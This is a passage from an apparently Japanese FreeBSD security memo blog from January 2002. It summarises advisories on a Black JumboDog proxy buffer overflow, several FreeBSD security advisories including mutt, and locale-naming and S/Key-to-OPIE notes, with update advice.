汎用 proxy サーバ Black JumboDog 2.6.5 以前に弱点。 HTTP proxy 利用時に、異常な長さの expires、if-modified-since、Last_Modified を返す web サーバにアクセスすると buffer overflow してしまう。 これにより悪意ある web サーバ管理者は、Black JumboDog が稼働しているマシン上で、Black JumboDog 動作権限において任意のコードを実行できてしまう。
Black JumboDog 2.6.6 以降で fix されているので入れかえればよい。
Outpost Free 版のライセンスってどこに書いてあるんだろう。 みつけられないんだけど……。インストールを実行しないとわからないのかな。
過去のFreeBSD おぼえがき (Volume 58) の 2002年01月05日(土)15時01分55秒 と 2002年01月05日(土)14時57分22秒 も参照。
FreeBSD-SA-02:01.pkg_add: pkg_add におけるディレクトリ許可属性に起因するセキュリティ上の弱点
FreeBSD-SA-02:02.pw: pw(8) の競合状態による master.passwd 漏洩の危険性
過去のFreeBSD おぼえがき (Volume 57) の 2001年12月23日(日)01時38分27秒 の件。
FreeBSD-SA-02:03.mod_auth_pgsql: mod_auth_pgsql の port における認証の機能不全
[RHSA-2001:124-04] Updated mod_auth_pgsql packages available の話かなあ。
FreeBSD-SA-02:04.mutt: mutt の port におけるリモートから悪用可能なバッファオーバフロー問題
改訂版が出ている: FreeBSD-SA-02:04.mutt: mutt ports contain remotely exploitable buffer overflow [REVISED]。 詳細: mutt-1.2.5.1 and mutt-1.3.25 have just been released。 mutt 利用者は FreeBSD に限らず update しませう。
FreeBSD 4.5-RELEASE では ja_JP.eucJP が標準ってわけなのかな。 あと、current 方面は S/Key はやめやめで OPIE へ移行ってコトなのかな。 ふーむ。ユーザ教育とかも考えると、今から OPIE に移行しておいた方がいいんだろうか。
横井さんから: Linux では Locale name guideline に基づいて ja_JP.EUC-JP という名前にしようという動きになっている模様 (情報ありがとうございます)。 うーむ。統一できないものなんでしょうかねえ。